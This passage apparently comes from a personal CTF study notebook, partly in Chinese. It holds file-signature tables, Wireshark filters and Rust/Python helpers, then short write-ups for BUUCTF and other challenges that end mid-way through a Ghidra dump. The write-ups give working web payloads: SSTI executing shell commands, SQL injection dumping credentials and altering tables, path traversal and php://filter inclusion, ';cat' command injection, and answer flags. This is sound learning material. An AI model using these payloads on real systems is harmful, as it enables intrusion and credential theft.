<tr><td>Class File</td><td>.class</td><td>CA FE BA BE</td></tr>
<tr><td>JPEG graphic file</td><td>.jpg</td><td>FF D8</td></tr>
<tr><td>JPEG 2000 graphic file</td><td>.jp2</td><td>0000000C6A5020200D0A [….jP..]</td></tr>
<tr><td>GIF graphic file</td><td>.gif</td><td>47 49 46 38 [GIF89]</td></tr>
<tr><td>TIF graphic file</td><td>.tif</td><td>49 49 [II]</td></tr>
<tr><td>PNG graphic file</td><td>.png</td><td>89 50 4E 47 .PNG</td></tr>
<tr><td>WAV audio file</td><td>.wav</td><td>52 49 46 46 RIFF</td></tr>
<tr><td>ELF Linux EXE</td><td>.elf</td><td>7F 45 4C 46 .ELF</td></tr>
<tr><td>Photoshop Graphics</td><td>.psd</td><td>38 42 50 53 [8BPS]</td></tr>
<tr><td>Windows Meta File</td><td>.wmf</td><td>D7 CD C6 9A</td></tr>
<tr><td>MIDI file</td><td>.mid</td><td>4D 54 68 64 [MThd]</td></tr>
<tr><td>Icon file</td><td>.ico</td><td>00 00 01 00</td></tr>
<tr><td>MP3 file with ID3 identity tag</td><td>.mp3</td><td>49 44 33 [ID3]</td></tr>
<tr><td>AVI video file</td><td>.avi</td><td>52 49 46 46 [RIFF]</td></tr>
<tr><td>Flash Shockwave</td><td>.swf</td><td>46 57 53 [FWS]</td></tr>
<tr><td>Flash Video</td><td>.flv</td><td>46 4C 56 [FLV]</td></tr>
<tr><td>Mpeg 4 video file</td><td>.mp4</td><td>00 00 00 18 66 74 79 70 6D 70 34 32 [….ftypmp42]</td></tr>
<tr><td>MOV video file</td><td>.mov</td><td>6D 6F 6F 76 [….moov]</td></tr>
<tr><td>Windows Video file</td><td>.wmv</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>Windows Audio file</td><td>.wma</td><td>30 26 B2 75 8E 66 CF</td></tr>
<tr><td>PKZip</td><td>.zip</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>GZip</td><td>.gz</td><td>1F 8B 08</td></tr>
<tr><td>Tar file</td><td>.tar</td><td>75 73 74 61 72</td></tr>
<tr><td>Microsoft Installer</td><td>.msi</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Object Code File</td><td>.obj</td><td>4C 01</td></tr>
<tr><td>Dynamic Library</td><td>.dll</td><td>4D 5A [MZ]</td></tr>
<tr><td>CAB Installer file</td><td>.cab</td><td>4D 53 43 46 [MSCF]</td></tr>
<tr><td>Executable file</td><td>.exe</td><td>4D 5A [MZ]</td></tr>
<tr><td>RAR file</td><td>.rar</td><td>52 61 72 21 1A 07 00 [Rar!…]</td></tr>
<tr><td>SYS file</td><td>.sys</td><td>4D 5A [MZ]</td></tr>
<tr><td>Help file</td><td>.hlp</td><td>3F 5F 03 00 [?_..]</td></tr>
<tr><td>VMWare Disk file</td><td>.vmdk</td><td>4B 44 4D 56 [KDMV]</td></tr>
<tr><td>Outlook Post Office file</td><td>.pst</td><td>21 42 44 4E 42 [!BDNB]</td></tr>
<tr><td>PDF Document</td><td>.pdf</td><td>25 50 44 46 [%PDF]</td></tr>
<tr><td>Word Document</td><td>.doc</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>RTF Document</td><td>.rtf</td><td>7B 5C 72 74 66 31 [{ tf1]</td></tr>
<tr><td>Excel Document</td><td>.xls</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>PowerPoint Document</td><td>.ppt</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>Visio Document</td><td>.vsd</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>DOCX (Office 2010)</td><td>.docx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>XLSX (Office 2010)</td><td>.xlsx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>PPTX (Office 2010)</td><td>.pptx</td><td>50 4B 03 04 [PK]</td></tr>
<tr><td>Microsoft Database</td><td>.mdb</td><td>53 74 61 6E 64 61 72 64 20 4A 65 74</td></tr>
<tr><td>Postcript File</td><td>.ps</td><td>25 21 [%!]</td></tr>
<tr><td>Outlook Message File</td><td>.msg</td><td>D0 CF 11 E0 A1 B1 1A E1</td></tr>
<tr><td>EPS File</td><td>.eps</td><td>25 21 50 53 2D 41 64 6F 62 65 2D 33 2E 30 20 45 50 53 46 2D 33 20 30</td></tr>
<tr><td>Jar File</td><td>.jar</td><td>50 4B 03 04 14 00 08 00 08 00</td></tr>
<tr><td>SLN File</td><td>.sln</td><td>4D 69 63 72 6F 73 6F 66 74 20 56 69 73 75 61 6C 20 53 74 75 64 69 6F 20 53 6F 6C 75 74 69 6F 6E 20 46 69 6C 65</td></tr>
<tr><td>Zlib File</td><td>.zlib</td><td>78 9C</td></tr>
<tr><td>SDF File</td><td>.sdf</td><td>78 9C</td></tr>
</tbody></table>
</div>
<h2 id="python各版本对应的magic头"><a class="header" href="#python各版本对应的magic头">python各版本对应的magic头</a></h2>
<pre><code class="language-sh">Python 2.7|03f30d0a 00000000
Python 3.0|3b0c0d0a 00000000
Python 3.1|4f0c0d0a 00000000
Python 3.2|6c0c0d0a 00000000
Python 3.3|9e0c0d0a 00000000 00000000
Python 3.4|ee0c0d0a 00000000 00000000
Python 3.5|170d0d0a 00000000 00000000
Python 3.6|330d0d0a 00000000 00000000
Python 3.7|420d0d0a 00000000 00000000 00000000
Python 3.8|550d0d0a 00000000 00000000 00000000
Python 3.9|610d0d0a 00000000 00000000 00000000
Python 3.10|6f0d0d0a 00000000 00000000 00000000
</code></pre>
<h2 id="mics-思维导图"><a class="header" href="#mics-思维导图">Mics 思维导图</a></h2>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/ctf-%E6%9D%82%E9%A1%B9-%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE.png" alt="ctf-杂项-思维导图" /></p>
<h2 id="ascii表"><a class="header" href="#ascii表">ASCII表</a></h2>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/ascii.png" alt="ascii" /></p>
<h2 id="dagger-alphabet"><a class="header" href="#dagger-alphabet">dagger alphabet</a></h2>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230714003015911.png" alt="image-20230714003015911" /></p>
<h2 id="use-wireshark-filter-data"><a class="header" href="#use-wireshark-filter-data">Use wireshark filter data</a></h2>
<pre><code class="language-sh">http.request.method == POST and http contains “admin”
ip.src eq 192.168.1.107 or ip.dst eq 192.168.1.107 and ip.addr == 192.168.1.107
tcp.port == 80 and udp.dstport == 80 or tcp.srcport &lt;= 10000
tcp|udp|arp|icmp|http|smtp|ftp|dns|msnms|ip|ssl|not oicq|!bootp
eth.dst == A0:00:00:04:C5:84 and eth.src eq A0:00:00:04:C5:84 or eth.addr eq A0:00:00:04:C5:84
http.request.method == “GET” or http.request.method == “POST”
http.request.uri == “/img/logo-edu.gif” or http.request.uri contains “/img/logo-edu.gif” or http contains “GET”
</code></pre>
<h2 id="use-ctf-party"><a class="header" href="#use-ctf-party">Use ctf-party</a></h2>
<pre><code class="language-ruby">require 'ctf_party'
require 'base64'

'''
base64: to_b64, from_b64, b64? and bang versions
digest: md5, sha1, etc. and bang versions
flag: flag, flag!, flag? (apply/check a flag format)
rot: rot, rot13, rot_all and bang versions
hex: hex2dec, dec2hex, to_hex, from_hex, str2hex, hex2str, hex2bin, bin2hex, from_hexip, to_hexip and bang versions
case: randomcase, alternatecase and bang versions
cgi: urlencode, urlencode_component, urldecode, urldecode_component, htmlescape, htmlunescape and bang versions
bin: to_bin, from_bin, str2bin, bin2str, hex2bin, bin2hex and bang versions
leet: leet and bang version
dec: dec2str, str2dec, hex2dec, dec2hex and bang versions
xor: ulxor, alxor, urxor, arxor and bang versions
misc: istrip and bang version
'''

flag = 'flag{xs}'
p Base64.strict_encode64(flag)
p flag.flag?
p flag.to_b64!
p 'SGVsbG8gd29ybGQh'.b64?
p 'mystr'.rot13
p 'mystr'.rot(shift: 11)
p 'mystr'.sha2_512
p &quot;flag&quot;.to_bin
p &quot;https://xinghuo.xfyun.cn/desk&quot;.urlencode_component

# 定义一个数组
arr = [1, 2, 3, 4, 5]

# 使用 for 循环遍历数组
for i in 0..arr.length-1
  # 如果 i 是偶数，打印 arr[i]
  if i % 2 == 0
    # p arr[i]
  end
end
</code></pre>
<h2 id="use-dd"><a class="header" href="#use-dd">Use dd</a></h2>
<pre><code class="language-shell">dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
#参数说明:
if=file #输入文件名，缺省为标准输入。
of=file #输出文件名，缺省为标准输出。
bs=bytes #同时设置读写块的大小为 bytes ，可代替 ibs 和 obs 。
skip=blocks #从输入文件开头跳过 blocks 个块后再开始复制。&lt;/hr&gt;
#以IDF实验室“抓到一只苍蝇”为例，需要将获得的文件去除前364个字节：
dd if=s1 bs=1 skip=364 of=d1&lt;/hr&gt;
#使用dd命令分离文件格式如下：
dd if=源文件名 bs=1 skip=开始分离的字节数 of=目标文件名
</code></pre>
<h2 id="文件合并"><a class="header" href="#文件合并">文件合并</a></h2>
<pre><code class="language-sh">#将所有以chapter开头的文件按文件名从小到大的顺序合并，输出到book文件中
cat chapter01 chapter02 chapter03 &gt; book
</code></pre>
<h2 id="file-headers"><a class="header" href="#file-headers">file headers</a></h2>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>  let header_vec = vec![
    (&quot;JPEG&quot;,&quot;FFD8FFE1&quot;),
    (&quot;png&quot;,&quot;89504E47&quot;),
    (&quot;gif&quot;,&quot;47494638&quot;),
    (&quot;tiff&quot;,&quot;49492A00&quot;),
    (&quot;bmp&quot;,&quot;424DC001&quot;),
    (&quot;zip&quot;,&quot;504B304&quot;),
    (&quot;rar&quot;,&quot;52617221&quot;),
    (&quot;psd&quot;,&quot;38425053&quot;),
    (&quot;rtf&quot;,&quot;785C727466&quot;),
    (&quot;xml&quot;,&quot;3C3F786D6C&quot;),
    (&quot;html&quot;,&quot;68746D6C3E&quot;),
    (&quot;pdf&quot;,&quot;2550444662D312E&quot;),
    (&quot;wav&quot;,&quot;57415645&quot;),
    (&quot;pcap&quot;,&quot;4D3C2B1A&quot;),
    ];
<span class="boring">}</span></code></pre></pre>
<h2 id="image-rgb-分层"><a class="header" href="#image-rgb-分层">Image RGB 分层</a></h2>
<pre><code class="language-toml">[dependencies]
image = &quot;0.23&quot;
</code></pre>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>    fn fen_rgb_ceng() {
        // 载入原始图片并获取宽度和高度
        let img = image::open(&quot;xx_00029.png&quot;).unwrap();
        let (width, height) = img.dimensions();

        // 创建三个空白的 Rgb 图层
        let mut layer1 = image::RgbImage::new(width, height);
        let mut layer2 = image::RgbImage::new(width, height);
        let mut layer3 = image::RgbImage::new(width, height);

        // 将原始图片中的像素值分离到三个图层中
        for y in 0..height {
            for x in 0..width {
                let pixel = img.get_pixel(x, y);
                layer1.get_pixel_mut(x, y).0[0] = pixel.0[0];
                layer2.get_pixel_mut(x, y).0[1] = pixel.0[1];
                layer3.get_pixel_mut(x, y).0[2] = pixel.0[2];
            }
        }
        // 显示三个图层
        layer1.save(&quot;output_layer1.png&quot;).unwrap();
        layer2.save(&quot;output_layer2.png&quot;).unwrap();
        layer3.save(&quot;output_layer3.png&quot;).unwrap();
    }

<span class="boring">}</span></code></pre></pre>
<p>get RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span>  let image = image::open(&quot;xx_00034.png&quot;).unwrap();
    let (width, height) = image.dimensions();
    let mut rgba_vec:Vec&lt;(u8,u8,u8,u8)&gt; = vec![];
    let mut buf :Vec&lt;u8&gt; = vec![];
    for y in 0..height {
        for x in 0..width {
            let pixel = image.get_pixel(x, y);
            let rgba = pixel.0;
            if (rgba[0] ==254 &amp;&amp;rgba[1] ==254 &amp;&amp;rgba[2] ==254)||(rgba[0] ==0 &amp;&amp;rgba[1] ==0 &amp;&amp;rgba[2] ==0) {
                rgba_vec.push((rgba[0],rgba[1],rgba[2],rgba[3]));
            }
        }
    }
<span class="boring">}</span></code></pre></pre>
<p>create image from RGBA vec</p>
<pre><pre class="playground"><code class="language-rust"><span class="boring">#![allow(unused)]
</span><span class="boring">fn main() {
</span> fn create_image_from_rgba_vec(rgba_vec: Vec&lt;(u8, u8, u8, u8)&gt;) {
        let width = f64::sqrt(rgba_vec.len() as f64) as u32;
        let height = f64::sqrt(rgba_vec.len() as f64) as u32;
        // 创建一张空白图片
        let mut img: ImageBuffer&lt;Rgba&lt;u8&gt;, Vec&lt;_&gt;&gt; = ImageBuffer::new(width, height);
        // 将 rgba_vec 中的颜色填充到图片上
        for y in 0..height {
            for x in 0..width {
                let i = (y * width + x) as usize;
                let rgba = rgba_vec[i];
                img.get_pixel_mut(x, y).0 = [rgba.0, rgba.1, rgba.2,rgba.3];
            }
        }
        // 保存图片
        img.save(&quot;output.png&quot;).unwrap();
    }
<span class="boring">}</span></code></pre></pre>
<h2 id="rsa-参数解释"><a class="header" href="#rsa-参数解释">RSA 参数解释</a></h2>
<p>RSA，使用公钥与私钥配对来进行加密和解密。其中，p、q 是两个大素数，n=pq，f(n)=(p-1)(q-1) 是欧拉函数值，e 是与 f(n) 互质的整数，d 是满足 e*d≡1(mod f(n)) 的整数，m 是明文，c 是密文</p>
<h2 id="ccompress-and-decompress-zlib"><a class="header" href="#ccompress-and-decompress-zlib">ccompress and decompress zlib</a></h2>
<pre><code class="language-python">import zlib

# 压缩数据
data = b'Hello, world!'
compressed_data = zlib.compress(data)
print('Compressed data:', compressed_data)

# 解压数据
uncompressed_data = zlib.uncompress(compressed_data)
print('Uncompressed data:', uncompressed_data)
</code></pre>
<h2 id="simple_ssti_1"><a class="header" href="#simple_ssti_1">Simple_SSTI_1</a></h2>
<pre><code># %27 means '
# %20 means space
http://114.67.175.224:11296/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()}}
</code></pre>
<h2 id="simple_ssti_2"><a class="header" href="#simple_ssti_2">Simple_SSTI_2</a></h2>
<pre><code>http://114.67.175.224:16482/?flag={{config}}
flag{46fe7552dcee5c1bba675349353506d5}
</code></pre>
<h2 id="flask_fileupload"><a class="header" href="#flask_fileupload">Flask_FileUpload</a></h2>
<pre><code>1.echo &quot;import os\nos.system('cat ./flag')&quot; &gt; get_floag.txt
2.mv get_flag.txt get_flag.jpg
3.upload get_flag.jpg
flag{e58da7f2b3307deb9eb1d276cb8d524a}
</code></pre>
<h2 id="simple-image"><a class="header" href="#simple-image">Simple image</a></h2>
<pre><code>download the image
1.mv image.png image.html
2.cat image.html
3.get &quot;107;&amp;#101;&amp;#121;&amp;#123;&amp;#121;&amp;#111;&amp;#117;&amp;#32;&amp;#97;&amp;#114;&amp;#101;&amp;#32;&amp;#114;&amp;#105;&amp;#103;&amp;#104;&amp;#116;&amp;#125&quot; to Vec&lt;u8&gt;
4.decode Vec&lt;u8&gt; to string get key{you are right}
</code></pre>
<h1 id="shihua-write-up"><a class="header" href="#shihua-write-up">shihua Write up</a></h1>
<p>1.  hxxx</p>
<p>Flag:flag{flag_in_hexdecimal:)}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/67ec08a2b61b488e90b3b8e7f8861e72~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>3.  map
Flag:flag{mapisthekey}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/1516932f69f04c37964401291e2ff5a0~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>4.  bxxwxx
Flag:ctf{show_me_the_money}</p>
<pre><code>binwalk -e bxxwxx 
cd _bxxwxx.extracted
cat flag.txt
</code></pre>
<p>5.  Zip0
Flag:flag{pseudo_encryption}</p>
<pre><code>use imhex open zip0.zip
remove password
save zip0.zip
open flag.png
</code></pre>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/e8598a148e8a4d24af53e03e095042f5~tplv-k3u1fbpfcp-zoom-1.image" alt="" />
<img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/a1d750b73b9147ec873eec9dc8f17ada~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>6.  sxxxhxxx
flag:ctf{welcom_to_upc_im} </p>
<pre><code>steghide extract -sf stxxhxxx.jpeg 
cat info
</code></pre>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/863e3b69ded140809acd459002836899~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>7.  Caesar</p>
<p>Flag:flag{this_is_rot_14:)}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/7df6272003ee42148f74c45ffb0996b7~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>8.  Vig</p>
<p>Flag:flag{vigenere_cipher}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/9c507a09c94a4d4e8a3763240005fb64~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>9.  xor</p>
<p>Flag:flag{flag1sxor}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/7a8b79be0c1c479cab3022d2ddda0409~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<p>10.  Easyre</p>
<p>Flag:flag{this_Is_a_EasyRe}</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/1433bcbbdde544c28ed706af89e99786~tplv-k3u1fbpfcp-zoom-1.image" alt="" /></p>
<h1 id="buuctf"><a class="header" href="#buuctf">BUUCTF</a></h1>
<h2 id="linux-labs-1"><a class="header" href="#linux-labs-1">Linux Labs 1</a></h2>
<pre><code>1.run &quot;ssh -p 29381 root@node4.buuoj.cn&quot; to connect ssh
2.enter password 123456
3.cd ..
4.cat flag.txt
flag{374920b5-66a9-4779-9172-5176eae58b85}
</code></pre>
<h2 id="buu-lfi-course-1"><a class="header" href="#buu-lfi-course-1">BUU LFI COURSE 1</a></h2>
<pre><code>http://81402a4e-a4c6-493f-b96e-8bf140d81bec.node4.buuoj.cn:81/?file=../../../flag
flag{241f21aa-3d5b-4540-9afb-3d1fd7da9197}
</code></pre>
<h2 id="buu-brute-1"><a class="header" href="#buu-brute-1">BUU BRUTE 1</a></h2>
<pre><code>url = &quot;http://d1c5dde5-7e42-4f0a-a0a4-464717740958.node4.buuoj.cn:81/?username=admin&amp;password={1000..10000}&quot;
1.for loop get body
2.if body contains(&quot;flag&quot;) println body
</code></pre>
<h2 id="buu-sql-course-1"><a class="header" href="#buu-sql-course-1">BUU SQL COURSE 1</a></h2>
<pre><code>1. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(username)%20from%20admin) to get username
2. open http://29c00a23-aea5-4f2d-a2b8-d4f24d8eea48.node4.buuoj.cn:81/backend/content_detail.php?id=-1%20union%20select%201,(select%20group_concat(password)%20from%20admin) to get user password
3. enter username and password clock login to see flag
</code></pre>
<h2 id="极客大挑战-2019easysql"><a class="header" href="#极客大挑战-2019easysql">[极客大挑战 2019]EasySQL</a></h2>
<pre><code>username:admin' or 1=1#
password:123456
flag{331c23f4-983a-4a29-b38a-d9c93b1734f2}
</code></pre>
<h2 id="hctf-2018warmup"><a class="header" href="#hctf-2018warmup">[HCTF 2018]WarmUp</a></h2>
<pre><code>1. ? URL ecode =&gt; %3F
2. %3F URL ecode =&gt; %253F
3. open url to get flag http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php%253F../../../../../ffffllllaaaagggg
4. or open http://290d8b27-9f57-4e6e-b2b6-42bc0991ede1.node4.buuoj.cn:81/?file=source.php?../../../../../ffffllllaaaagggg
</code></pre>
<h2 id="极客大挑战-2019havefun"><a class="header" href="#极客大挑战-2019havefun">[极客大挑战 2019]Havefun</a></h2>
<pre><code>1.open source code cansee this
`
    &lt;!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
    --&gt;
`
2. parse cat param http://352c414e-7254-40cc-b802-f66498fc1bd4.node4.buuoj.cn:81/?cat=dog get flag
</code></pre>
<h2 id="actf2020-新生赛include"><a class="header" href="#actf2020-新生赛include">[ACTF2020 新生赛]Include</a></h2>
<pre><code>1. click tip to open http://4237a679-489a-465c-9936-d7b0d68aba04.node4.buuoj.cn:81/?file=flag.php
2. open hackbar load url and change ?file=flag.php to ?file=php://filter/read=convert.base64-encode/resource=flag.php
3. copy base64 and open base_64.py decode base64 can see flag
</code></pre>
<h2 id="actf2020-新生赛exec"><a class="header" href="#actf2020-新生赛exec">[ACTF2020 新生赛]Exec</a></h2>
<pre><code>1.enter 127.0.0.1;ls click Enter can see we can run cmd
2.enter 127.0.0.1;ls ../../../;cat ../../../flag  can get flag
flag{8d209996-9c2b-48e8-bdac-3b6ae15fb98b}
</code></pre>
<h2 id="强网杯-2019随便注"><a class="header" href="#强网杯-2019随便注">[强网杯 2019]随便注</a></h2>
<pre><code>1. enter &quot;1';show databases#&quot; and click submit can se all databases
2. enter &quot;1';use supersqli;show tables#&quot; and click submit canse all tables in supersqli
3. enter &quot;1';use supersqli;show columns from `1919810931114514`#&quot; and click submit
4. enter &quot;1';use supersqli;show columns from words#&quot; and click submit
5. enter &quot;1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`;alter table `words` change `flag` `id` varchar(100);#&quot; and click submit
6. enter &quot;1' or 1=1#&quot; an click can see flag
</code></pre>
<h2 id="gxyctf2019ping-ping-ping25"><a class="header" href="#gxyctf2019ping-ping-ping25">[GXYCTF2019]Ping Ping Ping25</a></h2>
<pre><code>1. URL/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php see source code cansee flag
</code></pre>
<h2 id="suctf-2019easysql"><a class="header" href="#suctf-2019easysql">[SUCTF 2019]EasySQL</a></h2>
<pre><code>1. enter &quot;1;show databases;&quot;
2. &quot;1;show tables;&quot;
3. &quot;1;set sql_mode=pipes_as_concat;select 1&quot;
</code></pre>
<h2 id="md5"><a class="header" href="#md5">MD5</a></h2>
<pre><code>https://buuoj.cn/challenges#MD5
1.unzip file and open .txt copy md5 code
2.open https://www.bejson.com/enc/md5dsc/ tp decode MD5 code
flag{admin1}
</code></pre>
<h2 id="一眼就解密"><a class="header" href="#一眼就解密">一眼就解密</a></h2>
<pre><code>https://buuoj.cn/challenges#%E4%B8%80%E7%9C%BC%E5%B0%B1%E8%A7%A3%E5%AF%86
1.canse it's a base64 code
2.so decode base64 can get the flag
</code></pre>
<h2 id="url编码"><a class="header" href="#url编码">Url编码</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a URL encoded
2.so decode the code
flag{and 1=1}
</code></pre>
<h2 id="看我回旋踢"><a class="header" href="#看我回旋踢">看我回旋踢</a></h2>
<pre><code>1.unzip file and open .txt copy url code
1.can find that is a synt encoded 凯撒密码
2.so decode the code use python/caesar_cipher.py
flag{5cd1004d-86a5-46d8-b720-beb5ba0417e1}
</code></pre>
<h2 id="摩丝"><a class="header" href="#摩丝">摩丝</a></h2>
<pre><code>1. unzip file and open .txt copy morse code
2. decode morse code with rust can get the flag
flag{ILOVEYOU}
</code></pre>
<h2 id="password"><a class="header" href="#password">password</a></h2>
<pre><code>1. unzip file and open .txt
2. can see the kay is 10 letter
3. so 张三 to zs and key{zs19900315}
flag{zs19900315}
</code></pre>
<h2 id="极客大挑战-2019secret-file"><a class="header" href="#极客大挑战-2019secret-file">[极客大挑战 2019]Secret File</a></h2>
<pre><code>1. open and view page source
2. open URL/Archive_room.php and view page source
3. copy URL/action.php open 3 times
4. open fiddler click  URL/action.php can see
`
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;!--
   secr3t.php
--&gt;
&lt;/html&gt;
`
5. open URL/secr3t.php can see flag.php but can't see it
6. so open URL/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php
7. decode base64 can get flag
flag{9835de9d-5d61-4551-9b44-0c1955464828}
</code></pre>
<h2 id="极客大挑战-2019lovesql"><a class="header" href="#极客大挑战-2019lovesql">[极客大挑战 2019]LoveSQL</a></h2>
<pre><code>1. open URL/check.php?username=admin' or '1'='1&amp;password=1
2. open URL/check.php?username=1' union select 1,2,3%23&amp;password=1
3. open URL/check.php?username=1' union select 1,database(),version()%23&amp;password=1
4. open URL/check.php?username=1' union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 %23&amp;password=1  get geekuser is password
5. open URL /check.php?username=1' union select 1,2,group_concat(concat_ws(0x7e,username,password)) from geek.l0ve1ysq1 %23&amp;password=1
os open /check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&amp;password=1
can see flag
</code></pre>
<h1 id="n1book-题目"><a class="header" href="#n1book-题目">N1book 题目</a></h1>
<h2 id="第一章web-第一题"><a class="header" href="#第一章web-第一题">第一章Web 第一题</a></h2>
<p>本测试题来自N1BOOK，考察常见的信息收集能力。flag被分割成3块，藏在3处，你能都找出来么？</p>
<pre><code class="language-sh">dirsearch -u http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/
</code></pre>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230605120217241-16859385699101.png" alt="image-20230605120217241" /></p>
<p>open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/flag1_is_her3_fun.txt get flag1 flag{info_1</p>
<pre><code class="language-sh">#get flag3
vim -r index.php.swp  
# p0rtant_hack}
</code></pre>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230605115957399-16859385780262.png" alt="image-20230605115957399" /></p>
<p>open http://eci-2ze4nzykqjiplw5d5h8b.cloudeci1.ichunqiu.com/index.php~  get flag2 s_v3ry_im</p>
<p>flag{info_1s_v3ry_imp0rtant_hack}</p>
<h1 id="ctf-初赛-writeup"><a class="header" href="#ctf-初赛-writeup">CTF 初赛 WriteUP</a></h1>
<h2 id="1-签到"><a class="header" href="#1-签到">1 签到</a></h2>
<pre><code class="language-sh">strings qiandao.bmp
</code></pre>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606161057495.png" alt="image-20230606161057495" /></p>
<p>flag{c545574d-9ce4-4ce7-997c-1f281d54a7c2}</p>
<h2 id="2-arp-1"><a class="header" href="#2-arp-1">2 ARP-1</a></h2>
<p>分析流量包发现只有一个字母变化</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606162223573.png" alt="image-20230606162223573" /></p>
<p>flag{2cbd116b-5fe9-4252-b9d9-7d794a519d59}</p>
<h2 id="5-cc_1"><a class="header" href="#5-cc_1">5 cc_1</a></h2>
<p>已知</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606161312058.png" alt="image-20230606161312058" /></p>
<p>点击魔法棒</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606161517274.png" alt="image-20230606161517274" /></p>
<p>得到flag</p>
<p><img src="https://gitcode.net/dnrops/blog_images/-/raw/main/all_imgs/image-20230606161605814.png" alt="image-20230606161605814" /></p>
<p>flag{e84a3130-c4b9-492c-9ab2-d395a43cbc31}</p>
<h2 id="8-re_ez"><a class="header" href="#8-re_ez">8 re_ez</a></h2>
<p>用ghidra打开re1.exe,经过分析发现在.data section存在一下数据</p>
<pre><code>		// .data 
       // ram:14002a000-ram:14002a1ff
       //
       DAT_14002a000          XREF[1]:     14000024c(*)  
       14002a000 01              ??         01h
       14002a001 00              ??         00h
       14002a002 00              ??         00h
       14002a003 00              ??         00h
       14002a004 00              ??         00h
       14002a005 00              ??         00h
       14002a006 00              ??         00h
       14002a007 00              ??         00h
       14002a008 01              ??         01h
       14002a009 00              ??         00h
       14002a00a 00              ??         00h
       14002a00b 00              ??         00h
       14002a00c 00              ??         00h
       14002a00d 00              ??         00h
       14002a00e 00              ??         00h
       14002a00f 00              ??         00h
       14002a010 01              ??         01h
       14002a011 00              ??         00h
       14002a012 00              ??         00h
       14002a013 00              ??         00h
       14002a014 01              ??         01h
       14002a015 00              ??         00h
       14002a016 00              ??         00h
       14002a017 00              ??         00h
       14002a018 00              ??         00h
       14002a019 00              ??         00h
       14002a01a 00              ??         00h
       14002a01b 00              ??         00h
       14002a01c 01              ??         01h
       14002a01d 00              ??         00h
       14002a01e 00              ??         00h
       14002a01f 00              ??         00h
       14002a020 00              ??         00h
       14002a021 00              ??         00h
       14002a022 00              ??         00h
       14002a023 00              ??         00h
       14002a024 01              ??         01h
       14002a025 00              ??         00h
       14002a026 00              ??         00h
       14002a027 00              ??         00h
       14002a028 01              ??         01h
       14002a029 00              ??         00h
       14002a02a 00              ??         00h
       14002a02b 00              ??         00h
       14002a02c 00              ??         00h
       14002a02d 00              ??         00h
       14002a02e 00              ??         00h
       14002a02f 00              ??         00h
       14002a030 01              ??         01h
       14002a031 00              ??         00h
       14002a032 00              ??         00h
       14002a033 00              ??         00h
       14002a034 00              ??         00h
       14002a035 00              ??         00h
       14002a036 00              ??         00h
       14002a037 00              ??         00h
       14002a038 01              ??         01h
       14002a039 00              ??         00h
       14002a03a 00              ??         00h
       14002a03b 00              ??         00h
       14002a03c 01              ??         01h
       14002a03d 00              ??         00h
       14002a03e 00              ??         00h
       14002a03f 00              ??         00h
       14002a040 00              ??         00h
